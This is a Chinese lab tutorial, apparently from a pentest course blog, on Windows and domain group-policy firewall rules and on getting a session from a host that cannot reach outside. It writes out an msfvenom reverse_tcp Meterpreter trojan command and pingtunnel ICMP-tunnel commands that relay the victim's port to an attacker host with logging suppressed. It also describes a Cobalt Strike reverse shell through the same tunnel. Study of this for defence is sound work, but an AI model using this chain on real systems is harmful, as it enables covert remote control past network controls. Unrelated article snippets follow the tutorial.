第123天:内网安全-域防火墙入站出站规则不出网隧道上线组策略对象同步

目录

案例一: 单机-防火墙-限制端口\协议出入站

案例二:不出网的解决思路

入站连接

隧道技术

案例三:域控-防火墙-组策略对象同步

案例四:域控-防火墙-组策略不出网上线

msf

cs


案例一: 单机-防火墙-限制端口\协议出入站

入站是指别人主动来连接/访问你

在一个单机系统当中只启动一个共用防火墙,剩下都关闭

启动网站服务,当这个启动的时候,curl访问网站失败

而当关闭入站连接的时候,网站又会重现显示,这是入站的时候被阻止了

而出站是自己主动的去访问别人,windows防火墙出站默认是允许的

这里制作一个msf木马进行上传

msf开启监听

不设置规则的时候这个时候运行木马是可以进行连接的

设置一个出站限制

设置端口

设置规则

设置应用的防火墙范围

设置名称

这个时候运行没有任何反应

这样也只是禁用了一个端口,假如别人用的是4444端口,这里尝试修改禁止所有端口出站

自然就无法连接msf了

案例二:不出网的解决思路

入站连接

出站被限制死了,但是入站没有,可以主动连接木马

采用 windows/meterpreter/bind_tcp就是主动进行正向连接(入站)

生成正向连接的木马进行上传

设置模块,以及远程地址,运行木马,等待正向链接

隧道技术

限制了tcp协议,但是这些协议是向下兼容的,限制了tcp,也并非就限制了网络层以下类似icmp等协议

这里设置禁用所有tcp协议

去访问百度的时候会发现,浏览器无法访问,但是可以ping通

因为浏览器走的协议是http协议,而ping协议走的是icmp协议,所以隧道的思路就是把tcp协议利用icmp等等别的协议进行出网转发

案例三:域控-防火墙-组策略对象同步

在域控主机中打开组策略管理

找到域然后新建连接

配置该连接,右键点击配置

配置防火墙策略,域,专用,公用全部设置开启

域内主机,防火墙初始状态

更新组策略的命令

gpupdate/force

现在主机状态

也可以采用重启或者强制进行重置

配置禁止出网的规则

三个网络都配置,命名为no

尝试更新

案例四:域控-防火墙-组策略不出网上线

两种情况

这里目前是有网络,但是tcp封杀第二种情况,用的隧道技术

msf

首先先生成一个msf木马,生成的时候把地址设置为127.0.0.1,反弹给自己的3333端口

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe

设置msf进行监听

这里需要把3333端口通过icmp协议转发到这个攻击主机的4444端口用到的项目地址

GitHub - esrrhs/pingtunnel: Pingtunnel is a tool that send TCP/UDP traffic over ICMP

下载这两个版本

linux传到攻击主机,windows传到被控主机

kali开启隧道用来接收别人通过icmp传给自己的,传过来将其又转换为tcp端口(sudo权限)

sudo ./pingtunnel -type server

windows被控主机开启工具,将自己的3333端口监听发送给攻击主机的4444端口(需要管理员权限)noprint nolog是指不要输出日志

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.172.132 -t 192.168.172.132:4444 -tcp 1 -noprint 1 -nolog 1

这个时候再运行木马,成功上线

cs

设置反弹给自己的监听模块

利用这个监听器生成一个木马

再设置一个接收反弹信息的监听器

 windows通过icmp反弹5555端口

kali开启隧道

运行木马,成功反弹shell

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/48811.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PHP MySQL Update

PHP MySQL Update 在PHP开发中,与MySQL数据库的交互是至关重要的。其中,更新数据库中的数据是一项基本且常见的操作。本文将详细介绍如何使用PHP来更新MySQL数据库中的数据。 1. 环境准备 在开始之前,请确保您的开发环境满足以下条件&…

RabbitMQ的学习和模拟实现|sqlite轻量级数据库的介绍和简单使用

SQLite3 项目仓库:https://github.com/ffengc/HareMQ SQLite3 什么是SQLite为什么需要用SQLite官方文档封装Helper进行一些实验 什么是SQLite SQLite是一个进程内的轻量级数据库,它实现了自给自足的、无服务器的、零配置的、事务性的 SQL数据库引擎…

CTFSHOW game-gyctf web2

【2020年新春战“疫”】game-gyctf web2 参考https://www.cnblogs.com/aninock/p/15408090.html 说明:看见网上好像没多少人写,刚好玩到这道题了,就写一下吧。 一、利用入口 常规套路发现www.zip然后进行代码审计 index可以包含update&…

汽车技术智能化程度不断提升,线束可靠性如何设计?

随着汽车技术的高速发展,汽车自动化、智能化程度的逐步提高,人们对汽车的安全性、舒适性、娱乐性等要求也不断提高,加上汽车节能减排法规的不断严峻,整车电气设备不断增加,作为连接汽车各种电器设备“神经网络”的整车…

【Ubuntu】Ubuntu20修改MAC地址

文章目录 一、临时修改MAC地址(重启后复原)二、永久修改MAC地址 场景:在做虚拟机复制时,复制完的两台虚拟机存在相同MAC,导致无法分别分配IP。 解决:修改一台虚拟机的MAC地址。 一、临时修改MAC地址&#…

谷粒商城实战笔记-跨域问题

一,When allowCredentials is true, allowedOrigins cannot contain the special value “*” since that cannot be set on the “Access-Control-Allow-Origin” response header. To allow credentials to a set of origins, list them explicitly or consider u…

余弦退火示例pytorch

余弦退火学习率调度器是一种用于动态调整学习率的方法,能够在训练过程中逐渐降低学习率,从而有助于模型更好地收敛。我们可以通过PyTorch中的torch.optim.lr_scheduler.CosineAnnealingLR来实现这种调度器。 下面是一个包含3层Conv2d模型的示例&#xf…

数据清洗系统设计

设计一个高效的数据清洗系统旨在确保数据的质量,以便后续分析和决策过程可以基于准确、一致和完整的信息。以下是设计实时数据清洗系统时需要考虑的关键要素,结合之前提到的设计目标和原则: 1. 高效的数据处理 技术选型:采用并行…

Linux基于CentOS7【yum】【vim】的基础学习,【普通用户提权】

目录 yum生态 什么是yum yum是如何得知目标服务器的地址和下载链接 vim vim模式 命名模式 光标移动 插入模式 i键插 a键插 o键插 底行模式 批量化注释 批量化去注释 创建vim配置文件 例子 高亮功能: 缩进功能: 符号位自动补齐功能…

面试题002:Java的数据类型

基本数据类型:包括 整数类型(byte、int、short、long)、浮点数类型(float、double)、字符类型(char)、布尔类型(boolean)。 引用数据类型:包括数组&#xff0…

win10安装ElasticSearch7.x和分词插件

说明: 以下内容整理自网络,格式调整优化,更易阅读,希望能对需要的人有所帮助。 一 安装 Java环境 ElasticSearch使用Java开发的,依赖Java环境,安装 ElasticSearch 7.x 之前,需要先安装jdk-8。…

梅卡曼德高精度 DLP 结构光焊接专用 3D 相机

精度高,抗环境光、抗反光,成像效果好 自研蓝光 DLP 投影技术及双目结构光 3D 成像算法,相 机精度高,抗环境光、抗反光性能优异。在实际场景中, 可对各类复杂焊接件、焊缝高质量成像。 超小体积,超强适…

UFO:革新Windows操作系统交互的UI聚焦代理

人工智能咨询培训老师叶梓 转载标明出处 人机交互的便捷性和效率直接影响着我们的工作和生活质量。尽管现代操作系统如Windows提供了丰富的图形用户界面(GUI),使得用户能够通过视觉和简单的点击操作来控制计算机,但随着应用程序功…

FTP传输的两种模式的技术原理和应用

文章目录 一、主动模式(Port Mode)二、被动模式(Pasv Mode)三、FTP的控制命令与数据传输四、FTP的安全性考虑SFTP 和 FTPS五、FTP服务器开启PASV模式的设置六、在IE浏览器中禁用PASV方式七、FTP客户端常见错误及解决办法1. 连接超时2. 数据传输中断3. 无法打开数据连接4. 权…

数据库分表实践

目录 前言 如何分表 分表带来的问题 跨库事务 分页查询,排序问题 联表问题 二次分表 一致性ID 前言 如果单表的数据量过大,则会影响查询效率。想要解决这个问题,显然,直接拆分就完事了。一张表的数据量过多,那…

分享一个最近在进行前后端联调时改了2天的bug...

场景再现 我们这边前端端口是8080 后端端口是8121 我们在前端里在首页面写了一个任务 当进入网页三秒后 发起一个叫getLoginUser的请求 我们的getLoginUser是调用的这里 一个异步请求 这边我们前端调用后端的接口也已经写好 我们先把后端跑起来 访问前端页面 接收到了这个…

数学建模学习(112):FAHP模糊层次分析法

文章目录 一、FAHP方法由来二、模糊层次分析法原理2.1 AHP缺陷2.2 模糊集理论2.3 模糊层次分析法(FAHP)三、模糊层次分析法步骤3.1 问题定义与层次结构建立3.2 构造模糊判断矩阵3.2.1 计算模糊判断矩阵的列和向量3.2.2 计算模糊综合向量3.2.3 计算模糊权重向量3.3 解模糊数3.…

搜维尔科技:Manus Metagloves使用精确的量子跟踪技术捕捉手部每一个细节动作

Manus Metagloves使用精确的量子跟踪技术捕捉手部每一个细节动作 搜维尔科技:Manus Metagloves使用精确的量子跟踪技术捕捉手部每一个细节动作

Ubuntu 22.04.4 LTS (linux) Tomcat 9 内存和线程优化

1 Apache Tomcat 9.0.91 线程 #在70行左右,增加如下 sudo vim /data/tomcat/conf/server.xmlmaxThreads"800" #客户请求最大线程数minSpareThreads"200" #最小线程数maxSpareThreads"500" #最大线程数acceptCount"800"…

监控易V7.6.6.15全新升级14:设置功能全面优化

随着企业IT架构的不断发展,对运维管理的需求也日益增加。为了满足广大用户对运维管理的更高需求,监控易系统近期完成了一次重要版本升级。本次升级在原有功能的基础上,对设置功能进行了全面优化和新增,旨在为用户提供更加灵活、高…